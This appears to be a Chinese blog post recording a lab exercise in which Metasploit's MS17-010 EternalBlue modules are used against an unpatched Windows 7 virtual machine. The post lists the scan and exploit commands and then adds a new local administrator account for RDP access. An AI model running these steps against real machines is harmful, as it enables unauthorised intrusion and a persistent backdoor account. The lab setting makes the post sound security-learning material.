试试MSF的ms17-010永恒之蓝漏洞利用

试验环境

(内网地址)

  • -win7(未打补丁开445) 10.77.0.128
  • kali 10.77.0.109

首先信息收集,探测

  • nmap意思一下

- nmap -sS -P0 -A -v 10.77.0.100

开的445

扫描漏洞

  • msfconsole 启动
msfconsole
  • 加载扫描exp

use auxiliary/scanner/smb/smb_ms17_010

show options

在这里插入图片描述

  • 设置目标ip
set RHOST 10.77.0.128 
  • 运行
run

在这里插入图片描述发现可以利用


漏洞利用

  • 加载攻击模块
use exploit/windows/smb/ms17_010_eternalblue
  • 设置参数
set RHOST 10.77.0.128
  • 运行
run

在这里插入图片描述
运行成功 进去了

可以直接CMD命令
在这里插入图片描述


权限很高
直接net user

net user 123 1234 /add(用户名 密码)
net localgroup administrators xxxx /add (将用户设置为管理员权限)

重新打开一个终端

rdesktop+IP

在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值